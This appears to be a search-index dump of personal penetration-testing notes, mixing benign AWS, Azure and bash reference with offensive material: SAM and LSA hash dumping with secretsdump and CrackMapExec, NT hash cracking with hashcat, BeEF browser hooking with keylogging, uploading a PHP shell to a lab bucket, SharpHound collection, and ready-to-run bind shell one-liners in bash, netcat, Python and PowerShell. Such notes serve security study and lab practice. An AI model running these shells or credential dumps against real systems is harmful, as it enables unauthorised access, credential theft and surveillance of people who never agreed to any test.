    The first step secretsdump executes is targeting the system bootkey before proceeding to dump the LOCAL SAM hashes. It cannot dump those hashes without the boot key because that boot key is used to encrypt & decrypt the SAM database.

    Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n(uid:rid:lmhash:nthash)\n

    Most modern Windows operating systems store the password as an NT hash. Operating systems older than Windows Vista & Windows Server 2008 store passwords as an LM hash, so we may only benefit from cracking those if our target is an older Windows OS. Knowing this, we can copy the NT hashes associated with each user account into a text file and start cracking passwords.

    "},{"location":"attacking-sam/#3-cracking-hashes-with-hashcat","title":"3. Cracking Hashes with Hashcat","text":"

    See hashcat:

    # Adding nthashes to a .txt File\n# Copy paste them in hashestocrack.txt\n\n# Hashcat them\nsudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt\n# -m 1000: select module for NT hashes\n
    "},{"location":"attacking-sam/#dumping-sam-remotely","title":"Dumping SAM Remotely","text":""},{"location":"attacking-sam/#with-crackmapexec","title":"With CrackMapExec","text":"

    With access to credentials with local admin privileges, it is also possible for us to target LSA Secrets over the network.

    Cheat sheet of CrackMapExec.

    crackmapexec smb $ip --local-auth -u <username> -p <password> --sam\n\ncrackmapexec smb $ip --local-auth -u <username> -p <password> --lsa\n
    "},{"location":"aws-cli/","title":"AWS cli","text":"

    Tool to list S3 objects. S3 is an object storage service in the AWS cloud service. With S3, you can store objects in buckets. Files stored in an Amazon S3 bucket are called S3 objects.

    ","tags":["cloud","amazon","s3","aws"]},{"location":"aws-cli/#installation","title":"Installation","text":"
    curl \"https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip\" -o \"awscliv2.zip\"\nunzip awscliv2.zip\nsudo ./aws/install\n

    Update version:

    sudo ./aws/install --bin-dir /usr/local/bin --install-dir /usr/local/aws-cli --update\n

    To authenticate you will need access keys. You can generate access keys in the AWS Dashboard.

    aws configure  \nAWS Access Key ID [None]: a  \nAWS Secret Access Key [None]: a  \nDefault region name [None]: <region>  \nDefault output format [None]: text\n\n#######################\n###### Where\n#######################\n# - _AWS Access Key ID_ & _AWS Secret Access Key can be any random strings at least one character long,_\n# - _Default region name_ can be any region from [AWS\u2019s region list](https://aws.amazon.com/about-aws/global-infrastructure/regions_az/),\n# - _Default output format_ can be `json`, `yaml`, `yaml-stream`, `table` or `text`. As we are not expecting enormous amount of data, `text` should do just fine.\n
    ","tags":["cloud","amazon","s3","aws"]},{"location":"aws-cli/#basic-commands","title":"Basic commands","text":"
    # Check version\naws --version\n\n# List IAM users (if you have permissions)\naws iam list-users --region <region>\n# --region is optional\n

    Upload the file simpleshell.php to the S3 bucket thetoppers.htb:

    aws --endpoint=http://s3.thetoppers.htb s3 cp simpleshell.php s3://thetoppers.htb\n
    aws [service-name] [command] [args] [--flag1] [--flag2]\n
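    For S3 itself, a couple of hedged examples against the same lab endpoint as above (the bucket and endpoint names follow the earlier example):

    # List buckets exposed by the endpoint\naws --endpoint=http://s3.thetoppers.htb s3 ls\n\n# List objects inside a bucket\naws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb\n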
    ","tags":["cloud","amazon","s3","aws"]},{"location":"azure-cli/","title":"Azure-CLI","text":"

    The Azure CLI is a cross-platform (Windows, Linux, and macOS) command-line program to connect to Azure and execute administrative commands on Azure resources.

    All commands: https://learn.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest.

    It's an executable program that you can use to execute commands in Bash, and it covers nearly every management task in Azure. Like Azure PowerShell, the CLI allows administrators and developers to run one-off commands from a terminal or command prompt, or to combine commands into a script and execute them together, instead of using a web browser.

    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#installation","title":"Installation","text":"
    • Linux: apt-get on Ubuntu, yum on Red Hat, and zypper on OpenSUSE
    • Mac: Homebrew.

    1. Modify your sources list so that the Microsoft repository is registered and the package manager can locate the Azure CLI package:

    AZ_REPO=$(lsb_release -cs)\necho \"deb [arch=amd64] https://packages.microsoft.com/repos/azure-cli/ $AZ_REPO main\" | \\\nsudo tee /etc/apt/sources.list.d/azure-cli.list\n
    2. Import the encryption key for the Microsoft Ubuntu repository. This allows the package manager to verify that the Azure CLI package you install comes from Microsoft.
    curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -\n
    3. Install the Azure CLI:
    sudo apt-get install apt-transport-https\nsudo apt-get update\nsudo apt-get install azure-cli\n
    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#basic-usage","title":"Basic usage","text":"

    Run Azure-CLI

    # Running Azure-CLI from Cloud Shell\nbash\n\n# Running Azure-CLI from Linux\naz\n

    Basic commands to warm up:

    # See installed version\naz --version\n\n# you can use the letters az to start an Azure command \naz upgrade\n\n# Launch Azure CLI interactive mode\naz interactive\n\n# Getting help. If you want to find commands that might help you manage a storage blob, you can use the find command:\naz find blob\n\n# If you already know the name of the command you want, the --help argument shows detailed help:\naz storage blob --help\n

    Commands in the CLI are structured in groups and subgroups. Each group represents a service provided by Azure, and the subgroups divide commands for these services into logical groupings. For example, the storage group contains subgroups including account, blob, and queue.
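    For example, the group/subgroup structure is visible in a hedged sketch like this (the storage account and container names are placeholders):

    # group: storage / subgroup: blob / command: list\naz storage blob list --account-name <storageaccount> --container-name <container> --output table\n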

    Because you're working with a local install of the Azure CLI, you'll need to authenticate before you can execute Azure commands, using the Azure CLI login command.

    az login\n

    The Azure CLI will typically launch your default browser to open the Azure sign-in page. After successfully signing in, you'll be connected to your Azure subscription.
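    On a headless machine where no browser can be launched, the device-code flow is an alternative:

    az login --use-device-code\n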

    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#output-formatting","title":"Output formatting","text":"
    # Results in a json format by default\naz group list\n\n# Results in a line format\naz group list --out tsv\n\n# Results in a table\naz group list --out table\n
    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#resource-groups","title":"Resource groups","text":"
    # List resource groups\naz group list\n# remember you can format output\n\n# List all your resource groups in a table:\naz group list --output table\n\n# Return in json all my resources in my resource group:\naz group list --query \"[?name == '$RESOURCE_GROUP']\"\n\n\n# Retrieve properties from an existing and known resource group\naz group show --name myresourcegroup\n\n# From a specific resource group (provided, for instance, its name), query a value. Querying location:\naz group show --name <name> --query location --out table\n\n# Querying id\naz group show --name <name> --query id --out table\n\n# Create a Resource group\naz group create --name <name> --location <location>\n
    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#disk","title":"Disk","text":"
    # List disks\naz disk list\n\n# Retrieve the properties of an existing Disk\naz disk show --name myDiskname --resource-group rg-test2\n\n# Retrieve the properties of an existing Disk, and output it in a table\naz disk show --name myDiskname --resource-group rg-test2 --out table\n\n\n# Create a new disk\naz disk create --resource-group $myResourceGroup --name $mynewDisk --sku \"Standard_LRS\" --size-gb 32\n\n# Increase the size of a disk\naz disk update --resource-group $myResourceGroup --name $myDiskName --size-gb 64\n\n# Change standard SKU to premium\naz disk update --resource-group $myResourceGroup --name $myDiskName --sku \"Premium_LRS\"\n\n# Verify size of a disk by querying size\naz disk show --resource-group $myResourceGroup --name $myDiskName --query diskSizeGb --out table\n
    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#vms","title":"VMs","text":"
    # Check running VMs\naz vm list\n\n# List IP addresses \naz vm list-ip-addresses\n\n# Create a VM with UbuntuLTS\naz vm create --resource-group MyResourceGroup --name MyVM01 --image UbuntuLTS --generate-ssh-keys\n\n# Create a VM\naz vm create --resource-group learn-857e3399-575d-4759-8de9-0c5a22e035e9 --name my-vm  --public-ip-sku Standard --image Ubuntu2204 --admin-username azureuser  --generate-ssh-keys\n\n# Restart existing VM\naz vm restart -g MyResourceGroup -n MyVm\n\n# Configure Nginx on your VM\naz vm extension set  --resource-group learn-857e3399-575d-4759-8de9-0c5a22e035e9  --vm-name my-vm  --name customScript  --publisher Microsoft.Azure.Extensions  --version 2.1  --settings '{\"fileUris\":[\"https://raw.githubusercontent.com/MicrosoftDocs/mslearn-welcome-to-azure/master/configure-nginx.sh\"]}'  --protected-settings '{\"commandToExecute\": \"./configure-nginx.sh\"}'\n\n# Create a variable with public IP address: Run the following `az vm list-ip-addresses` command to get your VM's IP address and store the result as a Bash variable:\nIPADDRESS=\"$(az vm list-ip-addresses --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --name my-vm --query \"[].virtualMachine.network.publicIpAddresses[*].ipAddress\" --output tsv)\"\n
    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#nsg-network-security-groups","title":"NSG (Network Security Groups)","text":"
    # Run the following `az network nsg list` command to list the network security groups that are associated with your VM:\naz network nsg list --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --query '[].name' --output tsv\n\n# You see this:\n# my-vmNSG \n# Every VM on Azure is associated with at least one network security group. In this case, Azure created an NSG for you called _my-vmNSG_.\n# Run the following `az network nsg rule list` command to list the rules associated with the NSG named _my-vmNSG_:\naz network nsg rule list --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --nsg-name my-vmNSG\n\n# Run the `az network nsg rule list` command a second time. This time, use the `--query` argument to retrieve only the name, priority, affected ports, and access (**Allow** or **Deny**) for each rule. The `--output` argument formats the output as a table so that it's easy to read.\naz network nsg rule list --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --nsg-name my-vmNSG --query '[].{Name:name, Priority:priority, Port:destinationPortRange, Access:access}' --output table\n# You see this:\n# Name              Priority    Port    Access\n# -----------------  ----------  ------  --------\n# default-allow-ssh  1000        22      Allow\n\n# By default, a Linux VM's NSG allows network access only on port 22. This enables administrators to access the system. You need to also allow inbound connections on port 80, which allows access over HTTP.\n# Run the following `az network nsg rule create` command to create a rule called _allow-http_ that allows inbound access on port 80:\naz network nsg rule create --resource-group learn-51b45310-54be-47c3-8d62-8e53e9839083 --nsg-name my-vmNSG --name allow-http --protocol tcp --priority 100 --destination-port-range 80 --access Allow\n

    Script:

    # The script under https://raw.githubusercontent.com/MicrosoftDocs/mslearn-welcome-to-azure/master/configure-nginx.sh\n\n#!/bin/bash\n\n# Update apt cache.\nsudo apt-get update\n\n# Install Nginx.\nsudo apt-get install -y nginx\n\n# Set the home page.\necho \"<html><body><h2>Welcome to Azure! My name is $(hostname).</h2></body></html>\" | sudo tee -a /var/www/html/index.html\n

    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#app-service-plan","title":"App Service plan","text":"

    Create variables:

    export RESOURCE_GROUP=learn-fbc52a1a-b4e0-491b-ab1e-a2e3d6eff778 \nexport AZURE_REGION=eastus \nexport AZURE_APP_PLAN=popupappplan-$RANDOM \nexport AZURE_WEB_APP=popupwebapp-$RANDOM\n

    Create an App Service plan to run your app.

    az appservice plan create --name $AZURE_APP_PLAN --resource-group $RESOURCE_GROUP --location $AZURE_REGION --sku FREE\n

    Verify that the service plan was created successfully by listing all your plans in a table:

    az appservice plan list --output table\n
    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#web-app","title":"Web app","text":"

    Create variables:

    export RESOURCE_GROUP=learn-fbc52a1a-b4e0-491b-ab1e-a2e3d6eff778 \nexport AZURE_REGION=eastus \nexport AZURE_APP_PLAN=popupappplan-$RANDOM \nexport AZURE_WEB_APP=popupwebapp-$RANDOM\n

    Create a Web App

    # Create web app\naz webapp create --name $AZURE_WEB_APP --resource-group $RESOURCE_GROUP --plan $AZURE_APP_PLAN\n

    List existing ones:

    az webapp list --output table\n

    Return HTTP address of my web app:

    site=\"http://$AZURE_WEB_APP.azurewebsites.net\"\necho $site\n

    Getting the default html for the sample web app:

    curl $AZURE_WEB_APP.azurewebsites.net\n
    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#deploy-code-from-github","title":"Deploy code from Github","text":"

    Create variables:

    export RESOURCE_GROUP=learn-fbc52a1a-b4e0-491b-ab1e-a2e3d6eff778 \nexport AZURE_REGION=eastus \nexport AZURE_APP_PLAN=popupappplan-$RANDOM \nexport AZURE_WEB_APP=popupwebapp-$RANDOM\n

    The goal is to deploy code from a GitHub repository to the web app.

    az webapp deployment source config --name $AZURE_WEB_APP --resource-group $RESOURCE_GROUP --repo-url \"https://github.com/Azure-Samples/php-docs-hello-world\" --branch master --manual-integration\n

    Once it's deployed, hit your site again with a browser or CURL:

    curl $AZURE_WEB_APP.azurewebsites.net\n
    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#deploy-an-arm-template","title":"Deploy an ARM template","text":"

    Prerequisites:

    # First, sign in to Azure by using the Azure CLI \naz login\n\n# define your resource group. \n    # 1. You can obtain available location values from: \naz account list-locations\n    # 2. You can configure the default location using \naz configure --defaults location=<location>\n    # 3. If it does not exist, create it\n    az group create --name {name of your resource group} --location \"{location}\"\n

    Now, you are set. Deploy your ARM template:

    templateFile=\"{provide-the-path-to-the-template-file}\"\naz deployment group create --name blanktemplate --resource-group myResourceGroup --template-file $templateFile\n

    Use linked templates to deploy complex solutions. You can break a template into many templates and deploy these templates through a main template. When you deploy the main template, it triggers the linked template's deployment. You can store and secure the linked template by using a SAS token.
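    A hedged sketch of deploying a remote (linked) template by URI; the storage URI and SAS token are placeholders:

    az deployment group create --name linkeddemo --resource-group myResourceGroup --template-uri \"https://mystorage.blob.core.windows.net/templates/main.json?<sas-token>\"\n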

    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-cli/#aks","title":"AKS","text":"

    Azure Container Registry

    # Authenticate to an Azure Container Registry\naz acr login --name <acrName>\n# This logs in to the ACR using the token that was generated when the session was first authenticated.\n

    # Get the resource ID of your AKS cluster\nAKS_CLUSTER=$(az aks show --resource-group myResourceGroup --name myAKSCluster --query id -o tsv)\n\n# Get the account credentials for the logged in user\nACCOUNT_UPN=$(az account show --query user.name -o tsv)\nACCOUNT_ID=$(az ad user show --id $ACCOUNT_UPN --query objectId -o tsv)\n\n# Assign the 'Cluster Admin' role to the user\naz role assignment create --assignee $ACCOUNT_ID --scope $AKS_CLUSTER --role \"Azure Kubernetes Service Cluster Admin Role\"\n
    # You create an application named App1 in an Azure tenant. You need to host the application as a multitenant application for any users in Azure, while restricting non-Azure accounts. You need to allow administrators in other Azure tenants to add the application to their gallery.\naz ad app create --display-name app1 --sign-in-audience AzureADMultipleOrgs\n
    ","tags":["cloud","azure","bash","azure-cli"]},{"location":"azure-powershell/","title":"Azure Powershell","text":"

    See all available releases for powershell: https://github.com/PowerShell/PowerShell/releases.

    Azure powershell documentation: https://learn.microsoft.com/en-us/powershell/azure/?view=azps-10.3.0

    Az is the formal name for the Azure PowerShell module containing cmdlets to work with Azure features. It contains hundreds of cmdlets that let you control nearly every aspect of every Azure resource. You can work with the following features, and more: Resource groups, Storage, VMs, Azure AD, Containers, Machine learning.

    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#installation","title":"Installation","text":"
    # Get version of the installed AZ module\nGet-InstalledModule -Name Az -AllVersions | Select-Object -Property Name, Version\n\n# To install a new AZ Module, run as Administrator\nInstall-Module -Name Az -AllowClobber -Repository PSGallery -Force\n\n# To update the AZ Module, run as Administrator\nUpdate-Module -Name Az -Force\n

    You can have several versions of Azure PowerShell installed.

    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#linux","title":"Linux","text":"
    # Import the encryption key for the Microsoft Ubuntu repository. This key enables the package manager to verify that the PowerShell package you install comes from Microsoft.\ncurl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -\n\n# Register the Microsoft Ubuntu repository so the package manager can locate the PowerShell package:\nsudo curl -o /etc/apt/sources.list.d/microsoft.list https://packages.microsoft.com/config/ubuntu/18.04/prod.list\n\n# Update the list of packages:\nsudo apt-get update\n\n# Install PowerShell:\nsudo apt-get install -y powershell\n\n# Start PowerShell to verify that it installed successfully:\npwsh\n
    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#basic-commands","title":"Basic commands","text":"

    Cmdlets are shipped in modules. A PowerShell Module is a dynamic-link library (DLL) that includes the code to process each available cmdlet. Az is the formal name for the Azure PowerShell module, which contains cmdlets to work with Azure features.

    # Load module\nGet-Module\n\n# Install Azure module\nInstall-Module -Name Az -Scope CurrentUser -Repository PSGallery -Force\n\n# Update powershell module\nUpdate-Module -Name Az\n
    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#managing-infrastructure","title":"Managing infrastructure","text":"

    For an account to work, you need a subscription. Additionally, you will need to create several resources: a resource group, a storage account, and a file share.

    # First, connect to your Azure account\nConnect-AzAccount\n\n# List your subscriptions \nGet-AzSubscription\n\n# Set a variable name for your subscription context and set context in Azure\n$context = Get-AzSubscription -SubscriptionId <ID>\n# Set context \nSet-AzContext $context\n
    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#resource-groups","title":"Resource Groups","text":"
    # List existing Resource Groups\nGet-AzResourceGroup\n\n# Create a new Resource group. Two things needed: a name and a location. Create variables for those:\n$location = (Get-AzResourceGroup -Name resource-group_test1).Location\n$rgName = \"myresourcegroup\"\nNew-AzResourceGroup -Name $rgName -Location $location\n\n# A way to assign a variable to location if you want to replicate an existing location from another resource group \n$location = (Get-AzResourceGroup -Name $rgName).Location\n\n\n# Delete resource groups\nRemove-AzResourceGroup -Name \"ContosoRG01\"\n
    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#vms","title":"VMs","text":"
    # List VMs\nGet-AzVm\n\n\n# Create a new VM\nNew-AzVm -ResourceGroupName $rgName -Name \"MyVM01\" -Image \"UbuntuLTS\"\n
    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#storage-accounts","title":"Storage accounts","text":"
    # List VMs\nGet-AzStorageAccount\n
    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#file-disk","title":"File Disk","text":"
    # List all File shares\nGet-AzDisk\n\n# Create a new configuration for your File Disk\n$myDiskConfig = New-AzDiskConfig -Location $location -CreateOption Empty -DiskSizeGB 32 -Sku Standard_LRS\n\n# Create the file disk. First assign a variable for the disk name\n$myDiskName = \"myDiskname\"\nNew-AzDisk -ResourceGroupName $rgName -DiskName $myDiskName -Disk $myDiskConfig\n\n# Increase size of an existing Az Disk\nNew-AzDiskUpdateConfig -DiskSize 64 | Update-AzDisk -ResourceGroupName $rgName -DiskName $myDiskName\n\n# Get current SKU of a given Az Disk\n(Get-AzDisk -ResourceGroupName rg-test2 -Name myDiskName).Sku  \n\n# Update a Standard_LRS SKU to a premium one \nNew-AzDiskUpdateConfig -Sku Premium_LRS | Update-AzDisk -ResourceGroupName $rgName -DiskName $myDiskName\n
    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#webapps","title":"WebApps","text":"
    # List webapps and provide name and location\nGet-AzWebapp | Select-Object Name, Location\n
    ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#_1","title":"Azure Powershell","text":"","tags":["cloud","azure","powershell"]},{"location":"bash/","title":"Bash - Bourne Again Shell","text":"","tags":["bash"]},{"location":"bash/#file-descriptors-and-redirections","title":"File descriptors and redirections","text":"
    # <<: This is known as a \"here document\" or \"here-strings\" operator. It allows you to input multiple lines of text into a command or a file. Example:\ncat << EOF > stream.txt\n

    1. cat: It is a command used to display the contents of a file.

    2. <<: This is known as a \"here document\" or \"here-strings\" operator. It allows you to input multiple lines of text into a command or a file.

    3. EOF: It stands for \"End of File\" and serves as a delimiter to mark the end of the input. You can choose any other unique string instead of \"EOF\" as long as it is consistent with the opening and closing delimiter.

    4. >: This is a redirection operator used to redirect the output of a command to a file. In this case, it will create a new file named stream.txt or overwrite its contents if it already exists.

    5. stream.txt: It is the name of the file where the input text will be written. A complete example follows the list.
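    Putting it together, a complete here-document that writes two lines into stream.txt:

    cat << EOF > stream.txt\nfirst line\nsecond line\nEOF\n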

    ","tags":["bash"]},{"location":"bash/#shortcuts","title":"Shortcuts","text":"

    • Delete the last word: CTRL-W
    • Accept the next suggested word (shown in gray): CTRL + ->

    ","tags":["bash"]},{"location":"bash/#commands","title":"Commands","text":"","tags":["bash"]},{"location":"bash/#df","title":"df","text":"

    Displays the amount of space available on the file system containing each file name argument.

    df -H\n# -H: Print sizes in powers of 1000\n# -h: Print sizes in powers of 1024. Humanly readable.\n
    ","tags":["bash"]},{"location":"bash/#host","title":"host","text":"

    host is a simple utility for performing DNS lookups. It is normally used to convert names to IP addresses and vice versa. When no arguments or options are given, host prints a short summary of its command-line arguments and options.

    # General syntax\nhost <name> <server> \n\n# <name> is the domain name that is to be looked up. It can also be a dotted-decimal IPv4 address or a colon-delimited IPv6 address, in which case host by default performs  a  reverse  lookup  for  that  address.   \n# <server>  is  an optional argument which is either the name or IP address of the name server that host should query instead of the server or servers listed in /etc/resolv.conf.\n

    Example:

    host example.com 8.8.8.8\n
    ","tags":["bash"]},{"location":"bash/#lsblk","title":"lsblk","text":"
    # Lists block devices.\nlsblk\n
    ","tags":["bash"]},{"location":"bash/#lsusb","title":"lsusb","text":"
    # Lists USB devices\nlsusb\n
    ","tags":["bash"]},{"location":"bash/#lsof","title":"lsof","text":"
    # Lists opened files.\nlsof\n
    ","tags":["bash"]},{"location":"bash/#lspci","title":"lspci","text":"
    # Lists PCI devices.\nlspci\n
    ","tags":["bash"]},{"location":"bash/#lsb_release","title":"lsb_release","text":"

    Print distribution-specific information

    # Display version, id, description, release and codename of the distro\nlsb_release -a \n
    ","tags":["bash"]},{"location":"bash/#netstat","title":"netstat","text":"

    Print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships. By default, netstat displays a list of open sockets. If you don't specify any address families, then the active sockets of all configured address families will be printed.

    netstat -tnlp\n# -p: Show  the  PID  and name of the program to which each socket belongs. \n# -l: Show only listening sockets.\n\n# Show networks accessible via VP\nnetstat -rn\n# -r: Display the kernel routing tables. Replacement for netstat -r is \"ip route\".\n# -n: Show numerical addresses instead of trying to determine symbolic host, port or user names.\n
    ","tags":["bash"]},{"location":"bash/#sed","title":"sed","text":"

    sed looks for patterns we have defined in the form of regular expressions (regex) and replaces them with another pattern that we have also defined. Let us stick to the last results and say we want to replace the word \"bin\" with \"HTB.\"

    The \"s\" flag at the beginning stands for the substitute command. Then we specify the pattern we want to replace. After the slash (/), we enter the pattern we want to use as a replacement in the third position. Finally, we use the \"g\" flag, which stands for replacing all matches.

    cat /etc/passwd | grep -v \"false\\|nologin\" | tr \":\" \" \" | awk '{print $1, $NF}' | sed 's/bin/HTB/g'\n
    ","tags":["bash"]},{"location":"bash/#ss","title":"ss","text":"

    Sockets statistic. It can be used to check which ports are listening locally on a given machine.

    ss -ltn\n#-l: Display only listening sockets.\n#-t: Display TCP sockets.\n#-n: Do not try to resolve service name.\n

    How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only):

    ss -l -4 | grep -v \"127\\.0\\.0\" | grep \"LISTEN\" | wc -l\n#   **-l**: show only listening services\n#   **-4**: show only ipv4\n#   **-grep -v \"127.0.0\"**: exclude all localhost results\n#   **-grep \"LISTEN\"**: better filtering only listening services\n#   **wc -l**: count results\n
    ","tags":["bash"]},{"location":"bash/#uname","title":"uname","text":"

    # Print out the kernel release to search for potential kernel exploits quickly.\nuname -r\n\n## Flags\n-a, --all: print all information, in the following order, except omit -p and -i if unknown\n-s, --kernel-name: print the kernel name\n-n, --nodename: print the network node hostname\n-r, --kernel-release: print the kernel release\n-v, --kernel-version: print the kernel version\n-m, --machine: print the machine hardware name\n-p, --processor: print the processor type (non-portable)\n-i, --hardware-platform: print the hardware platform (non-portable)\n-o, --operating-system: print the operating system\n

    ","tags":["bash"]},{"location":"beef/","title":"BeEF - The browser exploitation framework project","text":"

    BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

    ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#installation","title":"Installation","text":"

    Repository: https://github.com/beefproject/beef

    git clone https://github.com/beefproject/beef\n
    ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#usage","title":"Usage","text":"

    Basically, it allows you to plant a hook through a persistent (stored) script injection. BeEF provides a panel showing the browsers connected to your hook. If an admin eventually visits the hooked page, you may gain access to the server.
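    A hedged sketch of the workflow, assuming BeEF's default configuration (panel on port 3000, hook served at /hook.js):

    # Start BeEF from the cloned repository\ncd beef && ./beef\n\n# Inject the hook into a vulnerable page, e.g. via stored XSS:\n#   <script src=\"http://<attacker_ip>:3000/hook.js\"></script>\n# Hooked browsers then appear in the panel at http://<attacker_ip>:3000/ui/panel\n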

    ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#basic-commands","title":"Basic commands","text":"
    Social engineering \nOpen webcams \nAlert messages\nRun javascript\nGet screenshots of what the person has on their screen\nRedirect browser\nCreate fake authentication dialog boxes (Facebook, ...)\n.......\n
    ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#attacks","title":"Attacks","text":"","tags":["web pentesting","phishing","tools"]},{"location":"beef/#tunneling-proxy","title":"Tunneling proxy","text":"

    See XSS attacks.

    An alternative to stealing protected cookies is to use the victim's browser as a proxy. The Tunneling Proxy in BeEF exploits the XSS flaw and uses the victim's browser to perform requests to the web application as the victim user. Basically, it tunnels requests through the hooked browser. By doing so, there is no way for the web application to distinguish between requests coming from a legitimate user and requests forged by an attacker. BeEF also lets you bypass other web developer protection techniques, such as multiple validations (User-Agent, custom headers, ...).

    ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#event-logger","title":"Event logger","text":"

    The event logger allows us to capture keystrokes, acting as a keylogger.

    ","tags":["web pentesting","phishing","tools"]},{"location":"bind-shells/","title":"Bind shells","text":"All about shells Shell Type Description Reverse shell Initiates a connection back to a \"listener\" on our attack box. Bind shell \"Binds\" to a specific port on the target host and waits for a connection from our attack box. Web shell Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a\u00a0PHP\u00a0script to run a single command.

    In a bind-shell the attacking machine initiates a connection to a listener port on the victim's machine.

    The first step in this attack is starting the listener on port '1234' on the remote host (the victim's), bound to IP '0.0.0.0' so that we can connect to it from anywhere.

    ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#bind-shell-connections","title":"Bind shell connections","text":"","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#bash","title":"bash","text":"
    rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f\n
    ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#netcat","title":"netcat","text":"
    nc -lvp 1234 -e /bin/bash\n
    ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#python","title":"python","text":"
    python -c 'exec(\"\"\"import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind((\"0.0.0.0\",1234));s1.listen(1);c,a=s1.accept();\\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())\"\"\")'\n
    ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#powershell","title":"powershell","text":"
    powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \" \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\n

    Second step: if we succeeded in the previous step, we have a shell waiting for us on the specified port (1234) on the victim's machine. Now, let's connect to it from our attacking machine:

    nc 10.10.10.1 1234\n# 10.10.10.1 would be the victim's machine\n# 1234 would be the listening port on the victim's machine\n

    Unlike a Reverse Shell, if we drop our connection to a bind shell for any reason, we can connect back to it and get another connection immediately. However, if the bind shell command is stopped for any reason, or if the remote host is rebooted, we would still lose our access to the remote host and will have to exploit it again to gain access.

    ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#some-more-resources","title":"Some more resources","text":"Reverse shell Link to resource PayloadsAllTheThings https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Bind%20Shell%20Cheatsheet.md)","tags":["pentesting","web pentesting","bind shells"]},{"location":"bloodhound/","title":"BloodHound","text":"

    (C# and PowerShell Collectors)

    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"bloodhound/#installation","title":"Installation","text":"

    BloodHound is a single page Javascript web application, built on top of\u00a0Linkurious, compiled with\u00a0Electron, with a\u00a0Neo4j\u00a0database fed by a C# data collector.

    Download github repo from: https://github.com/BloodHoundAD/BloodHound.

    Sharphound is the official data collector for BloodHound.

    sudo apt-get install bloodhound\n

    Initialize the console:

    sudo neo4j console \n

    Open the browser at the indicated address: http://localhost:7474/

    The first time it will ask you for default user and password: neo4j:neo4j.

    After logging into the application, you will be prompted to change the default password.

    ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"bloodhound/#basic-usage","title":"Basic usage","text":"

    1. Get the SharpHound collector running on the victim's machine:

    # Same as with powerview\npowershell -ep bypass\n\n# Load SharpHound (dot-source the script so Invoke-BloodHound becomes available)\n. ..\\Downloads\\SharpHound.ps1\n\n# Generate a zip file\nInvoke-BloodHound -CollectionMethod All -Domain CONTROLER.local -ZipFileName loot.zip\n

    2. Transfer the loot.zip file to your attacker machine.
